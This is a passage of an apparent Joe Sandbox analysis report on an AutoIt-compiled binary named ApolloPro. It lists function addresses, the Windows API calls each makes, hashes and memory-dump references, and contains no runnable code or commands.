                                                                                              • Opcode ID: 2e4e3ec55e40c349aaad39f844f5134cdd322a23ce34d2662c94f1f3a5617ce2
                                                                                              • Instruction ID: 8773de78f49c273ce5c9048a75f4fa79c62411648d5422cc58703954824ac7df
                                                                                              • Opcode Fuzzy Hash: 2e4e3ec55e40c349aaad39f844f5134cdd322a23ce34d2662c94f1f3a5617ce2
                                                                                              • Instruction Fuzzy Hash: 27F0497190020DEBEB00CF94C805BFE7BB9FF04315F10804AF9599A292D3799615DF94
                                                                                              Function 0069A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,006A9B52,?,006C098C,?), ref: 0069A6DA
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,006A9B52,?,006C098C,?), ref: 0069A6EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 3c10c9fadb6c285fd0fc4dccb418e4d85c5e7284f7c9c9022a3cf7841fc12552
                                                                                              • Instruction ID: d4c6b27b200b2976206de4b9c292a98570f7be46aac95d9a8d655789909574bb
                                                                                              • Opcode Fuzzy Hash: 3c10c9fadb6c285fd0fc4dccb418e4d85c5e7284f7c9c9022a3cf7841fc12552
                                                                                              • Instruction Fuzzy Hash: 0DF0893550421DBBDB209FA4CC48FEA77AEAF09351F004156B508D6141D6309551CBE1
                                                                                              Function 00688DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00688F27), ref: 00688DFE
                                                                                              • CloseHandle.KERNEL32(?,?,00688F27), ref: 00688E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: fefde609ef1d42d2d93bf42849b47a90e841842d844fa328cd16bb3676c9a0a9
                                                                                              • Instruction ID: b4ba9b1aa782d9c25e082bee55a4b89b640215e8c21ffb7e7558cd5e5ac58b52
                                                                                              • Opcode Fuzzy Hash: fefde609ef1d42d2d93bf42849b47a90e841842d844fa328cd16bb3676c9a0a9
                                                                                              • Instruction Fuzzy Hash: 32E04F35000600EFE7612B10EC08E7377AEEB04321B11891DF899844B0CB215C90DB10
                                                                                              Function 0065A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00658F87,0000FCD7,?,?,00000001), ref: 0065A38A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0065A393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 93bf818ba7a7be8c2fe6c9cf3c0179e4ca74d3dcbead921de56248699a50fdc9
                                                                                              • Instruction ID: 8ac61512d5c9a2c7bde5364547b189380da3b1c223adbb787b6ef53fb956ea4d
                                                                                              • Opcode Fuzzy Hash: 93bf818ba7a7be8c2fe6c9cf3c0179e4ca74d3dcbead921de56248699a50fdc9
                                                                                              • Instruction Fuzzy Hash: 6AB09231064249EBEB402B91EC09FA83F6AEB84A62F005010FA0D44060CF6254508A91
                                                                                              Function 006A45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 006A45F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 448a20ff8cb525b2539f26cfc89910b4e122ca131fb51bea8dfa371d905ad2e3
                                                                                              • Instruction ID: 1a8fdcdc307d79546c48dc3cc6c7a898a4099001b661ac8e89440682a435c5f2
                                                                                              • Opcode Fuzzy Hash: 448a20ff8cb525b2539f26cfc89910b4e122ca131fb51bea8dfa371d905ad2e3
                                                                                              • Instruction Fuzzy Hash: A4E09A312002059FD340AF5AE800A9AF7EAAF95760F00801AF809C7310DEB0AC018B90
                                                                                              Function 006951E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00695205
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 2434400541-0
                                                                                              • Opcode ID: f390d6ec50e44e73c5de2943604967ab0d32d9c7e18f6871c16699e831ad8066
                                                                                              • Instruction ID: ea08fe65c1b3dca8b1192a8059a938a1294aedae87d8e409cb40273b290cab1a
                                                                                              • Opcode Fuzzy Hash: f390d6ec50e44e73c5de2943604967ab0d32d9c7e18f6871c16699e831ad8066
                                                                                              • Instruction Fuzzy Hash: DBD052A4160E0A7AFD5A03248E0FFB6160FE3017C0F844249B80389AC2ECE06882B631
                                                                                              Function 00689369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00688FA7), ref: 00689389
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: 9a64a2e6969c707954014d1d795d03ee0c180e8379c94a61d017f298b33ba4e4
                                                                                              • Instruction ID: ef33e0c753776a74951c132fa1c1c2213ea8be5fd41df86bcc3d47a864979588
                                                                                              • Opcode Fuzzy Hash: 9a64a2e6969c707954014d1d795d03ee0c180e8379c94a61d017f298b33ba4e4
                                                                                              • Instruction Fuzzy Hash: 84D09E3226450EABEF019EA4DD05EBE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                                                              Function 00670722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00670734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 6296b00e1244fb73f2eb521d3b7b8f88e98a18dab098c204f783892c30a0e401
                                                                                              • Instruction ID: 9fd1d7ca48f35b105f6df7338145e7e05df54bf7169bba40431b00438248f6b7
                                                                                              • Opcode Fuzzy Hash: 6296b00e1244fb73f2eb521d3b7b8f88e98a18dab098c204f783892c30a0e401
                                                                                              • Instruction Fuzzy Hash: 93C048F2810109DBEB05DBA0DA88EFEBBBDAB08314F21405AA10AB2100D7789B448A71
                                                                                              Function 0065A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0065A35A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: d31bf46eb13120cf4bd5aa76e38d7a695db84faf1e6fcd75c09832d3a352c035
                                                                                              • Instruction ID: 5c3069a3ad03feeb74759c14527fb7c3f1267e32b3ab0757e395eb118af356f0
                                                                                              • Opcode Fuzzy Hash: d31bf46eb13120cf4bd5aa76e38d7a695db84faf1e6fcd75c09832d3a352c035
                                                                                              • Instruction Fuzzy Hash: 30A0223002020CFBCF002F82FC08CA8BFAEEB802A0F008020F80C00032CF33A8208AC0
                                                                                              Function 006A7EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 006A7F45
                                                                                              • DeleteObject.GDI32(00000000), ref: 006A7F57
                                                                                              • DestroyWindow.USER32 ref: 006A7F65
                                                                                              • GetDesktopWindow.USER32 ref: 006A7F7F
                                                                                              • GetWindowRect.USER32(00000000), ref: 006A7F86
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006A80C7
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006A80D7
                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A811F
                                                                                              • GetClientRect.USER32(00000000,?), ref: 006A812B
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006A8165
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8187
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A819A
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81A5
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006A81AE
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81BD
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006A81C6
                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81CD
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006A81D8
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81EA
                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006C3C7C,00000000), ref: 006A8200
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006A8210
                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006A8236
                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006A8255
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8277
                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8464
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: dcf3fc34645425c1aa03352cbbf1293f46a0ea69cc464cc280442578a7155e1b
                                                                                              • Instruction ID: 3345b2db3f62d6260a5492d6b45e64bdfea7ea549ad2429e802ee11152bbae99
                                                                                              • Opcode Fuzzy Hash: dcf3fc34645425c1aa03352cbbf1293f46a0ea69cc464cc280442578a7155e1b
                                                                                              • Instruction Fuzzy Hash: 61023F71900115EFDB14EFA4CC89EAEBBBAEF49310F148159F915AB2A1CB359D41CF60
                                                                                              Function 006B3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,006C0980), ref: 006B3C65
                                                                                              • IsWindowVisible.USER32(?), ref: 006B3C89
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                              • API String ID: 4105515805-45149045
                                                                                              • Opcode ID: 7d2a186f14905a1eab475684f9106558498cd16cda3f9005724ef413172ca1b1
                                                                                              • Instruction ID: fb6b6de1a0d508a6f7aa284c5d4671cee29a3028dac07fdbfd99c511405d3548
                                                                                              • Opcode Fuzzy Hash: 7d2a186f14905a1eab475684f9106558498cd16cda3f9005724ef413172ca1b1
                                                                                              • Instruction Fuzzy Hash: 72D1AF70204311CBCB44EF50C951AAABBB7AF94354F14495CF9965B3A2CF31EE8ACB85
                                                                                              Function 006BABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 006BAC55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006BAC86
                                                                                              • GetSysColor.USER32(0000000F), ref: 006BAC92
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 006BACAC
                                                                                              • SelectObject.GDI32(?,?), ref: 006BACBB
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 006BACE6
                                                                                              • GetSysColor.USER32(00000010), ref: 006BACEE
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 006BACF5
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 006BAD04
                                                                                              • DeleteObject.GDI32(00000000), ref: 006BAD0B
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 006BAD56
                                                                                              • FillRect.USER32(?,?,?), ref: 006BAD88
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BADB3
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(00000012), ref: 006BAF51
                                                                                                • Part of subcall function 006BAF18: SetTextColor.GDI32(?,?), ref: 006BAF55
                                                                                                • Part of subcall function 006BAF18: GetSysColorBrush.USER32(0000000F), ref: 006BAF6B
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(0000000F), ref: 006BAF76
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(00000011), ref: 006BAF93
                                                                                                • Part of subcall function 006BAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006BAFA1
                                                                                                • Part of subcall function 006BAF18: SelectObject.GDI32(?,00000000), ref: 006BAFB2
                                                                                                • Part of subcall function 006BAF18: SetBkColor.GDI32(?,00000000), ref: 006BAFBB
                                                                                                • Part of subcall function 006BAF18: SelectObject.GDI32(?,?), ref: 006BAFC8
                                                                                                • Part of subcall function 006BAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 006BAFE7
                                                                                                • Part of subcall function 006BAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006BAFFE
                                                                                                • Part of subcall function 006BAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 006BB013
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                              • String ID:
                                                                                              • API String ID: 4124339563-0
                                                                                              • Opcode ID: 327e4edcf06c300bf2dedd923b73dffce0366f717d0d860045755419332e54e4
                                                                                              • Instruction ID: 75a39fbdc314d42603e80dd1610b63e3aaac5dc94280bd2c8a12fc50359c7648
                                                                                              • Opcode Fuzzy Hash: 327e4edcf06c300bf2dedd923b73dffce0366f717d0d860045755419332e54e4
                                                                                              • Instruction Fuzzy Hash: A7A180B1008301FFE7519FA4DD08EABBBAAFF88321F141A19F566961A0D731D944CF52
                                                                                              Function 00632FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00633072
                                                                                              • DeleteObject.GDI32(00000000), ref: 006330B8
                                                                                              • DeleteObject.GDI32(00000000), ref: 006330C3
                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 006330CE
                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 006330D9
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0066C77C
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0066C7B5
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0066CBDE
                                                                                                • Part of subcall function 00631F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00632412,?,00000000,?,?,?,?,00631AA7,00000000,?), ref: 00631F76
                                                                                              • SendMessageW.USER32(?,00001053), ref: 0066CC1B
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0066CC32
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0066CC48
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0066CC53
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 464785882-4108050209
                                                                                              • Opcode ID: f66cf5bd4296f7f470df5d7e783f6320143e107ade60bda13da44549d00f7e5f
                                                                                              • Instruction ID: de9373f2e822b662f337927f3214e2e4319393cf58e57a8b3925bd3f0defd87d
                                                                                              • Opcode Fuzzy Hash: f66cf5bd4296f7f470df5d7e783f6320143e107ade60bda13da44549d00f7e5f
                                                                                              • Instruction Fuzzy Hash: DA128C30604A11EFDB25DF24C985BB9BBA6BF08320F14466DE995CB362C731ED42CB91
                                                                                              Function 006427FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 2660009612-1645009161
                                                                                              • Opcode ID: 314671920d4ab0dcb1d69e655c48ac95906f04659bb07123158b717d77b37317
                                                                                              • Instruction ID: 76d970d5a809b97f5d5a14c69c26790193b70be99df1d8a85ad90d4cfb3fb0a4
                                                                                              • Opcode Fuzzy Hash: 314671920d4ab0dcb1d69e655c48ac95906f04659bb07123158b717d77b37317
